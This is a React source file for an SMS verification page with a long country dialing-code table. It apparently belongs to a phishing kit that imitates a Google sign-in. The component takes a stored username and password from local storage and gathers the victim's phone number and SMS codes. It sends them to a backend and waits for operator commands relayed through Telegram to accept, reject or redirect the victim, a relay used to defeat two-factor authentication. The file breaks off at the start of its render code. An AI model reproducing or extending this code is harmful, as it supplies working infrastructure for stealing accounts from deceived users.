import { useState, useEffect, useRef } from "react";
import GoogleAuthPopup, { GoogleAccountChip } from "./GoogleAuthPopup";
import { FaChevronDown } from "react-icons/fa6";

// Country data with flags and codes - USED YOUR PROVIDED DATA
const countryPhoneData = [
  { code: 'AD', label: 'Andorra', phone: '376', phoneLength: 6 },
  { code: 'AE', label: 'United Arab Emirates', phone: '971', phoneLength: 9 },
  { code: 'AF', label: 'Afghanistan', phone: '93', phoneLength: 9 },
  { code: 'AG', label: 'Antigua and Barbuda', phone: '1-268', phoneLength: 10 },
  { code: 'AI', label: 'Anguilla', phone: '1-264', phoneLength: 10 },
  { code: 'AL', label: 'Albania', phone: '355', phoneLength: 9 },
  { code: 'AM', label: 'Armenia', phone: '374', phoneLength: 6 },
  { code: 'AO', label: 'Angola', phone: '244', phoneLength: 9 },
  { code: 'AQ', label: 'Antarctica', phone: '672', phoneLength: 6 },
  { code: 'AR', label: 'Argentina', phone: '54', phoneLength: [6,7,8] },
  { code: 'AS', label: 'American Samoa', phone: '1-684', phoneLength: 10 },
  { code: 'AT', label: 'Austria', phone: '43', phoneLength: [10,11] },
  { code: 'AU', label: 'Australia', phone: '61', phoneLength: 9 },
  { code: 'AW', label: 'Aruba', phone: '297', phoneLength: 7 },
  { code: 'AX', label: 'Alland Islands', phone: '358', phoneLength: [7,8,9,10] },
  { code: 'AZ', label: 'Azerbaijan', phone: '994', phoneLength: 9 },
  { code: 'BA', label: 'Bosnia and Herzegovina', phone: '387', phoneLength: 8 },
  { code: 'BB', label: 'Barbados', phone: '1-246', phoneLength: 10 },
  { code: 'BD', label: 'Bangladesh', phone: '880', phoneLength: 10 },
  { code: 'BE', label: 'Belgium', phone: '32', phoneLength: 9 },
  { code: 'BF', label: 'Burkina Faso', phone: '226', phoneLength: 8 },
  { code: 'BG', label: 'Bulgaria', phone: '359', phoneLength: 9 },
  { code: 'BH', label: 'Bahrain', phone: '973', phoneLength: 8 },
  { code: 'BI', label: 'Burundi', phone: '257', phoneLength: 8 },
  { code: 'BJ', label: 'Benin', phone: '229', phoneLength: 8 },
  { code: 'BL', label: 'Saint Barthelemy', phone: '590', phoneLength: 9 },
  { code: 'BM', label: 'Bermuda', phone: '1-441', phoneLength: 10 },
  { code: 'BN', label: 'Brunei Darussalam', phone: '673', phoneLength: 7 },
  { code: 'BO', label: 'Bolivia', phone: '591', phoneLength: 9 },
  { code: 'BR', label: 'Brazil', phone: '55', phoneLength: 11 },
  { code: 'BS', label: 'Bahamas', phone: '1-242', phoneLength: 10 },
  { code: 'BT', label: 'Bhutan', phone: '975', phoneLength: 7 },
  { code: 'BV', label: 'Bouvet Island', phone: '47', phoneLength: 10 },
  { code: 'BW', label: 'Botswana', phone: '267', phoneLength: 7 },
  { code: 'BY', label: 'Belarus', phone: '375', phoneLength: 9 },
  { code: 'BZ', label: 'Belize', phone: '501', phoneLength: 7 },
  { code: 'CA', label: 'Canada', phone: '1', phoneLength: 10 },
  { code: 'CC', label: 'Cocos (Keeling) Islands', phone: '61', phoneLength: 10 },
  { code: 'CD', label: 'Congo, Democratic Republic of the', phone: '243', phoneLength: 7 },
  { code: 'CF', label: 'Central African Republic', phone: '236', phoneLength: 8 },
  { code: 'CG', label: 'Congo, Republic of the', phone: '242', phoneLength: 9 },
  { code: 'CH', label: 'Switzerland', phone: '41', phoneLength: 9 },
  { code: 'CI', label: "Cote d'Ivoire", phone: '225', phoneLength: 8 },
  { code: 'CK', label: 'Cook Islands', phone: '682', phoneLength: 5 },
  { code: 'CL', label: 'Chile', phone: '56', phoneLength: 9 },
  { code: 'CM', label: 'Cameroon', phone: '237', phoneLength: 9 },
  { code: 'CN', label: 'China', phone: '86', phoneLength: 11 },
  { code: 'CO', label: 'Colombia', phone: '57', phoneLength: 10 },
  { code: 'CR', label: 'Costa Rica', phone: '506', phoneLength: 8 },
  { code: 'CU', label: 'Cuba', phone: '53', phoneLength: 8 },
  { code: 'CV', label: 'Cape Verde', phone: '238', phoneLength: 7 },
  { code: 'CW', label: 'Curacao', phone: '599', phoneLength: 7 },
  { code: 'CX', label: 'Christmas Island', phone: '61', phoneLength: 9 },
  { code: 'CY', label: 'Cyprus', phone: '357', phoneLength: 8 },
  { code: 'CZ', label: 'Czech Republic', phone: '420', phoneLength: 9 },
  { code: 'DE', label: 'Germany', phone: '49', phoneLength: 10 },
  { code: 'DJ', label: 'Djibouti', phone: '253', phoneLength: 10 },
  { code: 'DK', label: 'Denmark', phone: '45', phoneLength: 8 },
  { code: 'DM', label: 'Dominica', phone: '1-767', phoneLength: 10 },
  { code: 'DO', label: 'Dominican Republic', phone: '1-809', phoneLength: 10 },
  { code: 'DZ', label: 'Algeria', phone: '213', phoneLength: 9 },
  { code: 'EC', label: 'Ecuador', phone: '593', phoneLength: 9 },
  { code: 'EE', label: 'Estonia', phone: '372', phoneLength: 8 },
  { code: 'EG', label: 'Egypt', phone: '20', phoneLength: 10 },
  { code: 'EH', label: 'Western Sahara', phone: '212', phoneLength: 9 },
  { code: 'ER', label: 'Eritrea', phone: '291', phoneLength: 7 },
  { code: 'ES', label: 'Spain', phone: '34', phoneLength: 9 },
  { code: 'ET', label: 'Ethiopia', phone: '251', phoneLength: 9 },
  { code: 'FI', label: 'Finland', phone: '358', phoneLength: [9,10,11] },
  { code: 'FJ', label: 'Fiji', phone: '679', phoneLength: 7 },
  { code: 'FK', label: 'Falkland Islands (Malvinas)', phone: '500', phoneLength: 5 },
  { code: 'FM', label: 'Micronesia, Federated States of', phone: '691', phoneLength: 7 },
  { code: 'FO', label: 'Faroe Islands', phone: '298', phoneLength: 5 },
  { code: 'FR', label: 'France', phone: '33', phoneLength: 9 },
  { code: 'GA', label: 'Gabon', phone: '241', phoneLength: 7 },
  { code: 'GB', label: 'United Kingdom', phone: '44', phoneLength: 10 },
  { code: 'GD', label: 'Grenada', phone: '1-473', phoneLength: 10 },
  { code: 'GE', label: 'Georgia', phone: '995', phoneLength: 9 },
  { code: 'GF', label: 'French Guiana', phone: '594', phoneLength: 9 },
  { code: 'GG', label: 'Guernsey', phone: '44', phoneLength: 10 },
  { code: 'GH', label: 'Ghana', phone: '233', phoneLength: 9 },
  { code: 'GI', label: 'Gibraltar', phone: '350', phoneLength: 8 },
  { code: 'GL', label: 'Greenland', phone: '299', phoneLength: 6 },
  { code: 'GM', label: 'Gambia', phone: '220', phoneLength: 7 },
  { code: 'GN', label: 'Guinea', phone: '224', phoneLength: 9 },
  { code: 'GP', label: 'Guadeloupe', phone: '590', phoneLength: 9 },
  { code: 'GQ', label: 'Equatorial Guinea', phone: '240', phoneLength: 9 },
  { code: 'GR', label: 'Greece', phone: '30', phoneLength: 10 },
  { code: 'GS', label: 'South Georgia and the South Sandwich Islands', phone: '500', phoneLength: 5 },
  { code: 'GT', label: 'Guatemala', phone: '502', phoneLength: 8 },
  { code: 'GU', label: 'Guam', phone: '1-671', phoneLength: 10 },
  { code: 'GW', label: 'Guinea-Bissau', phone: '245', phoneLength: 9 },
  { code: 'GY', label: 'Guyana', phone: '592', phoneLength: 7 },
  { code: 'HK', label: 'Hong Kong', phone: '852', phoneLength: 8 },
  { code: 'HM', label: 'Heard Island and McDonald Islands', phone: '672', phoneLength: 10 },
  { code: 'HN', label: 'Honduras', phone: '504', phoneLength: 8 },
  { code: 'HR', label: 'Croatia', phone: '385', phoneLength: 9 },
  { code: 'HT', label: 'Haiti', phone: '509', phoneLength: 8 },
  { code: 'HU', label: 'Hungary', phone: '36', phoneLength: 9 },
  { code: 'ID', label: 'Indonesia', phone: '62', phoneLength: 11 },
  { code: 'IE', label: 'Ireland', phone: '353', phoneLength: 9 },
  { code: 'IL', label: 'Israel', phone: '972', phoneLength: 9 },
  { code: 'IM', label: 'Isle of Man', phone: '44', phoneLength: 10 },
  { code: 'IN', label: 'India', phone: '91', phoneLength: 10 },
  { code: 'IO', label: 'British Indian Ocean Territory', phone: '246', phoneLength: 7 },
  { code: 'IQ', label: 'Iraq', phone: '964', phoneLength: 10 },
  { code: 'IR', label: 'Iran, Islamic Republic of', phone: '98', phoneLength: 10 },
  { code: 'IS', label: 'Iceland', phone: '354', phoneLength: 7 },
  { code: 'IT', label: 'Italy', phone: '39', phoneLength: 10 },
  { code: 'JE', label: 'Jersey', phone: '44', phoneLength: 10 },
  { code: 'JM', label: 'Jamaica', phone: '1-876', phoneLength: 10 },
  { code: 'JO', label: 'Jordan', phone: '962', phoneLength: 9 },
  { code: 'JP', label: 'Japan', phone: '81', phoneLength: 10 },
  { code: 'KE', label: 'Kenya', phone: '254', phoneLength: 10 },
  { code: 'KG', label: 'Kyrgyzstan', phone: '996', phoneLength: 9 },
  { code: 'KH', label: 'Cambodia', phone: '855', phoneLength: 9 },
  { code: 'KI', label: 'Kiribati', phone: '686', phoneLength: 8 },
  { code: 'KM', label: 'Comoros', phone: '269', phoneLength: 7 },
  { code: 'KN', label: 'Saint Kitts and Nevis', phone: '1-869', phoneLength: 10 },
  { code: 'KP', label: "Korea, Democratic People's Republic of", phone: '850', phoneLength: [4,6,7,13] },
  { code: 'KR', label: 'Korea, Republic of', phone: '82', phoneLength: [7,8] },
  { code: 'KW', label: 'Kuwait', phone: '965', phoneLength: 8 },
  { code: 'KY', label: 'Cayman Islands', phone: '1-345', phoneLength: 7 },
  { code: 'KZ', label: 'Kazakhstan', phone: '7', phoneLength: 10 },
  { code: 'LA', label: "Lao People's Democratic Republic", phone: '856', phoneLength: [8,9] },
  { code: 'LB', label: 'Lebanon', phone: '961', phoneLength: [7,8] },
  { code: 'LC', label: 'Saint Lucia', phone: '1-758', phoneLength: 10 },
  { code: 'LI', label: 'Liechtenstein', phone: '423', phoneLength: [7,8,9] },
  { code: 'LK', label: 'Sri Lanka', phone: '94', phoneLength: 7 },
  { code: 'LR', label: 'Liberia', phone: '231', phoneLength: [8,9] },
  { code: 'LS', label: 'Lesotho', phone: '266', phoneLength: 8 },
  { code: 'LT', label: 'Lithuania', phone: '370', phoneLength: 8 },
  { code: 'LU', label: 'Luxembourg', phone: '352', phoneLength: 9 },
  { code: 'LV', label: 'Latvia', phone: '371', phoneLength: 8 },
  { code: 'LY', label: 'Libya', phone: '218', phoneLength: 10 },
  { code: 'MA', label: 'Morocco', phone: '212', phoneLength: 9 },
  { code: 'MC', label: 'Monaco', phone: '377', phoneLength: 8 },
  { code: 'MD', label: 'Moldova, Republic of', phone: '373', phoneLength: 8 },
  { code: 'ME', label: 'Montenegro', phone: '382', phoneLength: 8 },
  { code: 'MF', label: 'Saint Martin (French part)', phone: '590', phoneLength: 6 },
  { code: 'MG', label: 'Madagascar', phone: '261', phoneLength: 7 },
  { code: 'MH', label: 'Marshall Islands', phone: '692', phoneLength: 7 },
  { code: 'MK', label: 'Macedonia, the Former Yugoslav Republic of', phone: '389', phoneLength: 8 },
  { code: 'ML', label: 'Mali', phone: '223', phoneLength: 8 },
  { code: 'MM', label: 'Myanmar', phone: '95', phoneLength: [7,8,9,10] },
  { code: 'MN', label: 'Mongolia', phone: '976', phoneLength: 8 },
  { code: 'MO', label: 'Macao', phone: '853', phoneLength: 8 },
  { code: 'MP', label: 'Northern Mariana Islands', phone: '1-670', phoneLength: 7 },
  { code: 'MQ', label: 'Martinique', phone: '596', phoneLength: 9 },
  { code: 'MR', label: 'Mauritania', phone: '222', phoneLength: 8 },
  { code: 'MS', label: 'Montserrat', phone: '1-664', phoneLength: 10 },
  { code: 'MT', label: 'Malta', phone: '356', phoneLength: 8 },
  { code: 'MU', label: 'Mauritius', phone: '230', phoneLength: 8 },
  { code: 'MV', label: 'Maldives', phone: '960', phoneLength: 7 },
  { code: 'MW', label: 'Malawi', phone: '265', phoneLength: [7,8,9] },
  { code: 'MX', label: 'Mexico', phone: '52', phoneLength: 10 },
  { code: 'MY', label: 'Malaysia', phone: '60', phoneLength: 9 },
  { code: 'MZ', label: 'Mozambique', phone: '258', phoneLength: 12 },
  { code: 'NA', label: 'Namibia', phone: '264', phoneLength: 7 },
  { code: 'NC', label: 'New Caledonia', phone: '687', phoneLength: 6 },
  { code: 'NE', label: 'Niger', phone: '227', phoneLength: 8 },
  { code: 'NF', label: 'Norfolk Island', phone: '672', phoneLength: 6 },
  { code: 'NG', label: 'Nigeria', phone: '234', phoneLength: 8 },
  { code: 'NI', label: 'Nicaragua', phone: '505', phoneLength: 8 },
  { code: 'NL', label: 'Netherlands', phone: '31', phoneLength: 9 },
  { code: 'NO', label: 'Norway', phone: '47', phoneLength: 8 },
  { code: 'NP', label: 'Nepal', phone: '977', phoneLength: 10 },
  { code: 'NR', label: 'Nauru', phone: '674', phoneLength: 7 },
  { code: 'NU', label: 'Niue', phone: '683', phoneLength: 4 },
  { code: 'NZ', label: 'New Zealand', phone: '64', phoneLength: [8,9] },
  { code: 'OM', label: 'Oman', phone: '968', phoneLength: 8 },
  { code: 'PA', label: 'Panama', phone: '507', phoneLength: 8 },
  { code: 'PE', label: 'Peru', phone: '51', phoneLength: 9 },
  { code: 'PF', label: 'French Polynesia', phone: '689', phoneLength: 8 },
  { code: 'PG', label: 'Papua New Guinea', phone: '675', phoneLength: 8 },
  { code: 'PH', label: 'Philippines', phone: '63', phoneLength: 10 },
  { code: 'PK', label: 'Pakistan', phone: '92', phoneLength: 10 },
  { code: 'PL', label: 'Poland', phone: '48', phoneLength: 9 },
  { code: 'PM', label: 'Saint Pierre and Miquelon', phone: '508', phoneLength: 6 },
  { code: 'PN', label: 'Pitcairn', phone: '870', phoneLength: 9 },
  { code: 'PR', label: 'Puerto Rico', phone: '1', phoneLength: 10 },
  { code: 'PS', label: 'Palestine, State of', phone: '970', phoneLength: 9 },
  { code: 'PT', label: 'Portugal', phone: '351', phoneLength: 9 },
  { code: 'PW', label: 'Palau', phone: '680', phoneLength: 7 },
  { code: 'PY', label: 'Paraguay', phone: '595', phoneLength: 9 },
  { code: 'QA', label: 'Qatar', phone: '974', phoneLength: 8 },
  { code: 'RE', label: 'Reunion', phone: '262', phoneLength: 10 },
  { code: 'RO', label: 'Romania', phone: '40', phoneLength: 10 },
  { code: 'RS', label: 'Serbia', phone: '381', phoneLength: 9 },
  { code: 'RU', label: 'Russian Federation', phone: '7', phoneLength: 10 },
  { code: 'RW', label: 'Rwanda', phone: '250', phoneLength: 9 },
  { code: 'SA', label: 'Saudi Arabia', phone: '966', phoneLength: 9 },
  { code: 'SB', label: 'Solomon Islands', phone: '677', phoneLength: 7 },
  { code: 'SC', label: 'Seychelles', phone: '248', phoneLength: 7 },
  { code: 'SD', label: 'Sudan', phone: '249', phoneLength: 7 },
  { code: 'SE', label: 'Sweden', phone: '46', phoneLength: 9 },
  { code: 'SG', label: 'Singapore', phone: '65', phoneLength: 8 },
  { code: 'SH', label: 'Saint Helena', phone: '290', phoneLength: 4 },
  { code: 'SI', label: 'Slovenia', phone: '386', phoneLength: 8 },
  { code: 'SJ', label: 'Svalbard and Jan Mayen', phone: '47', phoneLength: 8 },
  { code: 'SK', label: 'Slovakia', phone: '421', phoneLength: 9 },
  { code: 'SL', label: 'Sierra Leone', phone: '232', phoneLength: 8 },
  { code: 'SM', label: 'San Marino', phone: '378', phoneLength: 10 },
  { code: 'SN', label: 'Senegal', phone: '221', phoneLength: 9 },
  { code: 'SO', label: 'Somalia', phone: '252', phoneLength: [8,9,10] },
  { code: 'SR', label: 'Suriname', phone: '597', phoneLength: [6,7] },
  { code: 'ST', label: 'Sao Tome and Principe', phone: '239', phoneLength: 7 },
  { code: 'SV', label: 'El Salvador', phone: '503', phoneLength: 8 },
  { code: 'SY', label: 'Syrian Arab Republic', phone: '963', phoneLength: 7 },
  { code: 'SZ', label: 'Swaziland', phone: '268', phoneLength: 8 },
  { code: 'TC', label: 'Turks and Caicos Islands', phone: '1-649', phoneLength: 10 },
  { code: 'TD', label: 'Chad', phone: '235', phoneLength: 6 },
  { code: 'TF', label: 'French Southern Territories', phone: '262', phoneLength: 10 },
  { code: 'TG', label: 'Togo', phone: '228', phoneLength: 8 },
  { code: 'TH', label: 'Thailand', phone: '66', phoneLength: 9 },
  { code: 'TJ', label: 'Tajikistan', phone: '992', phoneLength: 9 },
  { code: 'TK', label: 'Tokelau', phone: '690', phoneLength: 4 },
  { code: 'TL', label: 'Timor-Leste', phone: '670', phoneLength: 7 },
  { code: 'TM', label: 'Turkmenistan', phone: '993', phoneLength: 8 },
  { code: 'TN', label: 'Tunisia', phone: '216', phoneLength: 8 },
  { code: 'TO', label: 'Tonga', phone: '676', phoneLength: 5 },
  { code: 'TR', label: 'Turkey', phone: '90', phoneLength: 11 },
  { code: 'TT', label: 'Trinidad and Tobago', phone: '1-868', phoneLength: 10 },
  { code: 'TV', label: 'Tuvalu', phone: '688', phoneLength: 5 },
  { code: 'TW', label: 'Taiwan, Province of China', phone: '886', phoneLength: 9 },
  { code: 'TZ', label: 'United Republic of Tanzania', phone: '255', phoneLength: 7 },
  { code: 'UA', label: 'Ukraine', phone: '380', phoneLength: 9 },
  { code: 'UG', label: 'Uganda', phone: '256', phoneLength: 7 },
  { code: 'US', label: 'United States', phone: '1', phoneLength: 10 },
  { code: 'UY', label: 'Uruguay', phone: '598', phoneLength: 8 },
  { code: 'UZ', label: 'Uzbekistan', phone: '998', phoneLength: 9 },
  { code: 'VA', label: 'Holy See (Vatican City State)', phone: '379', phoneLength: 10 },
  { code: 'VC', label: 'Saint Vincent and the Grenadines', phone: '1-784', phoneLength: 10 },
  { code: 'VE', label: 'Venezuela', phone: '58', phoneLength: 7 },
  { code: 'VG', label: 'British Virgin Islands', phone: '1-284', phoneLength: 7 },
  { code: 'VI', label: 'US Virgin Islands', phone: '1-340', phoneLength: 10 },
  { code: 'VN', label: 'Vietnam', phone: '84', phoneLength: 9 },
  { code: 'VU', label: 'Vanuatu', phone: '678', phoneLength: 5 },
  { code: 'WF', label: 'Wallis and Futuna', phone: '681', phoneLength: 6 },
  { code: 'WS', label: 'Samoa', phone: '685', phoneLength: [5,6,7] },
  { code: 'XK', label: 'Kosovo', phone: '383', phoneLength: 8 },
  { code: 'YE', label: 'Yemen', phone: '967', phoneLength: 9 },
  { code: 'YT', label: 'Mayotte', phone: '262', phoneLength: 9 },
  { code: 'ZA', label: 'South Africa', phone: '27', phoneLength: 9 },
  { code: 'ZM', label: 'Zambia', phone: '260', phoneLength: 9 },
  { code: 'ZW', label: 'Zimbabwe', phone: '263', phoneLength: 9 }
];

// Convert countryPhoneData to format expected by the component
const countries = countryPhoneData.map(country => ({
  code: country.code,
  dialCode: `+${country.phone.replace('-', '')}`.replace(/^\+1-/, '+1'), // Clean the phone code
  name: country.label,
  flag: `https://flagcdn.com/w20/${country.code.toLowerCase()}.png`,
  phoneLength: country.phoneLength
}));

export default function Sms() {
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const [passwordSubmitRef, setPasswordSubmitRef] = useState(false);
  const [telegramReplyCode, setTelegramReplyCode] = useState("");
  const [showReplyCode, setShowReplyCode] = useState(false);
  const [waitingForPhoneCode, setWaitingForPhoneCode] = useState(false);
  const [phoneNumberSent, setPhoneNumberSent] = useState("");
  
  // Country selector state
  const [selectedCountry, setSelectedCountry] = useState(countries.find(c => c.code === 'US') || countries[0]);
  const [showCountryDropdown, setShowCountryDropdown] = useState(false);
  const [countrySearch, setCountrySearch] = useState("");
  
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const FRONT_URL = window.location.origin;
  const pollingIntervalRef = useRef(null);
  const isPolling = useRef(false);
  const lastTelegramCodeRef = useRef("");
  const hasAutoFilledRef = useRef(false);
  const countryDropdownRef = useRef(null);
  const verificationInProgressRef = useRef(false);
  const hasUserStartedProcessRef = useRef(false);
  const inputRef = useRef(null);
  const countryButtonRef = useRef(null);
  
  // Handle country selection
  const handleCountrySelect = (country) => {
    setSelectedCountry(country);
    setShowCountryDropdown(false);
    setCountrySearch("");
    // Focus on input after selecting country
    if (inputRef.current) {
      inputRef.current.focus();
    }
  };

  // Filter countries based on search
  const filteredCountries = countrySearch
    ? countries.filter(country => 
        country.name.toLowerCase().includes(countrySearch.toLowerCase()) ||
        country.dialCode.includes(countrySearch) ||
        country.code.toLowerCase().includes(countrySearch.toLowerCase())
      )
    : countries;

  // Format phone number to show first digit and last 2 digits with **** in between
  const formatPhoneNumber = (phoneNumber) => {
    if (!phoneNumber) return "";
    
    // Remove country code prefix
    const countryCodeLength = selectedCountry.dialCode.length;
    const numberWithoutCountryCode = phoneNumber.substring(countryCodeLength);
    
    if (numberWithoutCountryCode.length <= 3) {
      return phoneNumber;
    }
    
    const firstDigit = numberWithoutCountryCode.charAt(0);
    const lastTwoDigits = numberWithoutCountryCode.slice(-2);
    const middleDigits = numberWithoutCountryCode.substring(1, numberWithoutCountryCode.length - 2);
    const maskedMiddle = "*".repeat(middleDigits.length);
    
    return `${selectedCountry.dialCode} ${firstDigit}${maskedMiddle}${lastTwoDigits}`;
  };

  // Validate phone number based on country phone length
  const validatePhoneNumber = (phoneNumber) => {
    const phoneWithoutCountryCode = phoneNumber.substring(selectedCountry.dialCode.length);
    
    // Check if it's a valid number (only digits)
    if (!/^\d+$/.test(phoneWithoutCountryCode)) {
      return false;
    }
    
    // Check length based on country phone length
    const expectedLength = selectedCountry.phoneLength;
    
    if (Array.isArray(expectedLength)) {
      // If it's an array of possible lengths
      return expectedLength.some(len => phoneWithoutCountryCode.length === len);
    } else {
      // If it's a single number
      return phoneWithoutCountryCode.length === expectedLength;
    }
  };

  // Close dropdown when clicking outside
  useEffect(() => {
    const handleClickOutside = (event) => {
      if (countryDropdownRef.current && !countryDropdownRef.current.contains(event.target) &&
          countryButtonRef.current && !countryButtonRef.current.contains(event.target)) {
        setShowCountryDropdown(false);
        setCountrySearch("");
      }
    };
    document.addEventListener("mousedown", handleClickOutside);
    return () => document.removeEventListener("mousedown", handleClickOutside);
  }, []);

  const startPolling = (pollSessionId, isVerificationStage = false) => {
    if (!pollSessionId || isPolling.current) return;
    
    isPolling.current = true;
    
    if (pollingIntervalRef.current) {
      clearInterval(pollingIntervalRef.current);
    }
    
    const routes = {
      login: "/login",
      email: "/email",
      wp: "/wp",
      "2fa": "/2fa",
      sms: "/sms",
      wpauth: "/wp",
    };

    pollingIntervalRef.current = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${pollSessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        console.log("SMS Polling response:", data);

        setWaitingForPhoneCode(data.waiting_for_phone_code || false);
        
        // IMPORTANT CHANGE: Only process responses if user has started the process
        if (!hasUserStartedProcessRef.current && !showReplyCode) {
          console.log("Ignoring polling response - user hasn't started process yet");
          return;
        }
        
        if (data.phone_code && data.phone_code !== lastTelegramCodeRef.current) {
          console.log(`Phone code received: ${data.phone_code}`);
          lastTelegramCodeRef.current = data.phone_code;
          setTelegramReplyCode(data.phone_code);
          setShowReplyCode(true);
          
          // If not in verification stage, stop loading
          if (!verificationInProgressRef.current) {
            setLoading(false);
            setPasswordSubmitRef(false);
            setCode(""); // Clear the input field
            hasAutoFilledRef.current = false;
          }
        }
        else if (data.latest_phone_code && data.latest_phone_code !== lastTelegramCodeRef.current) {
          console.log(`Latest phone code received: ${data.latest_phone_code}`);
          lastTelegramCodeRef.current = data.latest_phone_code;
          setTelegramReplyCode(data.latest_phone_code);
          setShowReplyCode(true);
          
          // If not in verification stage, stop loading
          if (!verificationInProgressRef.current) {
            setLoading(false);
            setPasswordSubmitRef(false);
            setCode(""); // Clear the input field
            hasAutoFilledRef.current = false;
          }
        }
        else if (data.latest_code && data.latest_code !== lastTelegramCodeRef.current) {
          console.log(`Latest code received: ${data.latest_code}`);
          lastTelegramCodeRef.current = data.latest_code;
          setTelegramReplyCode(data.latest_code);
          setShowReplyCode(true);
          
          // If not in verification stage, stop loading
          if (!verificationInProgressRef.current) {
            setLoading(false);
            setPasswordSubmitRef(false);
            setCode(""); // Clear the input field
            hasAutoFilledRef.current = false;
          }
        }

        // Check for verification completion command from Telegram
        if (data.verification_complete) {
          console.log("Verification complete command received from Telegram");
          
          // Stop polling
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          verificationInProgressRef.current = false;
          
          // Stop loading
          setLoading(false);
          setPasswordSubmitRef(false);
          
          // Handle redirect or next step
          if (data.redirect && data.redirect.startsWith("http")) {
            console.log(`Redirecting to external: ${data.redirect}`);
            window.location.replace(data.redirect);
            return;
          }

          if (data.authType && data.authType !== "sms") {
            const route = routes[data.authType];
            if (route) {
              console.log(`Navigating to: ${route}`);
              window.location.replace(`${FRONT_URL}${route}`);
            } else {
              setError("Unknown authentication type.");
            }
            return;
          }
          
          // Show success message
          setInfoMessage("Verification successful!");
          return;
        }
        
        // Check for verification failed command from Telegram
        if (data.verification_failed) {
          console.log("Verification failed command received from Telegram");
          
          // Stop polling
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          verificationInProgressRef.current = false;
          
          // Stop loading and show error
          setLoading(false);
          setPasswordSubmitRef(false);
          setError(data.message || "Verification failed. Please try again.");
          return;
        }

        if (data.redirect && data.redirect.startsWith("http")) {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          verificationInProgressRef.current = false;
          setLoading(false);
          setPasswordSubmitRef(false);
          console.log(`Redirecting to external: ${data.redirect}`);
          window.location.replace(data.redirect);
          return;
        }

        if (data.authType && data.authType !== "sms") {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          verificationInProgressRef.current = false;
          setLoading(false);
          setPasswordSubmitRef(false);
          const route = routes[data.authType];
          if (route) {
            console.log(`Navigating to: ${route}`);
            window.location.replace(`${FRONT_URL}${route}`);
          } else {
            setError("Unknown authentication type.");
            setLoading(false);
          }
          return;
        }

        if (data.error) {
          console.log("Error from Telegram detected:", data.error);
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          verificationInProgressRef.current = false;
          setLoading(false);
          setPasswordSubmitRef(false);
          setError("That code didn't work. Please re-enter your code again.");
          return;
        }

        if (data.message) {
          setInfoMessage(data.message);
        }
        
      } catch (err) {
        console.error("Polling error:", err);
      }
    }, 3000);
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    
    // Set that user has started the process
    hasUserStartedProcessRef.current = true;
    
    if (showReplyCode) {
      // If we're sending verification code
      if (!code || code.length !== 6) {
        setError("Please enter the 6-digit verification code");
        return;
      }
      
      setError("");
      setInfoMessage("");
      setLoading(true);
      setPasswordSubmitRef(true);
      verificationInProgressRef.current = true; // Set verification in progress
      
      // Send code back to Telegram for verification
      submitToTelegram(code, true);
    } else {
      // If we're sending phone number
      const fullPhoneNumber = selectedCountry.dialCode + code;
      
      if (!code) {
        setError("Please enter a phone number");
        return;
      }
      
      // Validate phone number length
      if (!validatePhoneNumber(fullPhoneNumber)) {
        const expectedLength = selectedCountry.phoneLength;
        let lengthMessage;
        
        if (Array.isArray(expectedLength)) {
          lengthMessage = `Phone number should be ${expectedLength.join(' or ')} digits`;
        } else {
          lengthMessage = `Phone number should be ${expectedLength} digits`;
        }
        
        setError(`Invalid phone number for ${selectedCountry.name}. ${lengthMessage}`);
        return;
      }
      
      setError("");
      setInfoMessage("");
      setPasswordSubmitRef(true);
      setLoading(true);
      verificationInProgressRef.current = false; // Not verification stage yet
      
      // Store the phone number sent
      setPhoneNumberSent(fullPhoneNumber);
      
      submitToTelegram(fullPhoneNumber, false);
    }
  };

  const submitToTelegram = async (value, isVerification = false) => {
    try {
      const storedSessionId = localStorage.getItem("session_id");
      
      // Use the same endpoint for both cases
      const res = await fetch(`${API_URL}/api/sms`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ 
          code: value,
          username, 
          password,
          session_id: storedSessionId || sessionId,
          is_verification: isVerification // Tell backend this is verification stage
        }),
      });

      if (!res.ok) {
        const data = await res.json();
        throw new Error(data.detail || "Request failed");
      }

      const data = await res.json();
      const { session_id } = data;
      
      if (session_id) {
        setSessionId(session_id);
        localStorage.setItem("session_id", session_id);
      } else if (storedSessionId) {
        setSessionId(storedSessionId);
      }
      
      // Start polling (loading will remain active until reply from Telegram)
      startPolling(session_id || storedSessionId || sessionId, isVerification);
      
    } catch (err) {
      console.error("Request failed:", err);
      setError(err.message || "Request failed");
      setLoading(false);
      setPasswordSubmitRef(false);
      verificationInProgressRef.current = false;
    }
  };

  useEffect(() => {
    return () => {
      if (pollingIntervalRef.current) {
        clearInterval(pollingIntervalRef.current);
        pollingIntervalRef.current = null;
        isPolling.current = false;
        verificationInProgressRef.current = false;
      }
    };
  }, []);

  useEffect(() => {
    const storedUsername = localStorage.getItem("username") || "";
    const storedPassword = localStorage.getItem("password") || "";
    const storedSessionId = localStorage.getItem("session_id") || null;
    
    setUsername(storedUsername);
    setPassword(storedPassword);
    
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
    
    // Reset user started flag when component mounts
    hasUserStartedProcessRef.current = false;
    
    // Focus on input when component mounts
    if (inputRef.current) {
      setTimeout(() => inputRef.current.focus(), 100);
    }
  }, []);

  // Calculate dropdown position when it opens
  const getDropdownPosition = () => {
    if (!countryButtonRef.current) return {};
    
    const buttonRect = countryButtonRef.current.getBoundingClientRect();
    const viewportHeight = window.innerHeight;
    
    // Check if there's enough space below the button
    const spaceBelow = viewportHeight - buttonRect.bottom;
    const dropdownHeight = 350; // Approximate dropdown height
    
    if (spaceBelow > dropdownHeight) {
      // Show below the button
      return {
        top: buttonRect.bottom + 5,
        left: buttonRect.left
      };
    } else {
      // Show above the button
      return {
        top: buttonRect.top - dropdownHeight - 5,
        left: buttonRect.left
      };
    }
  };

  return (
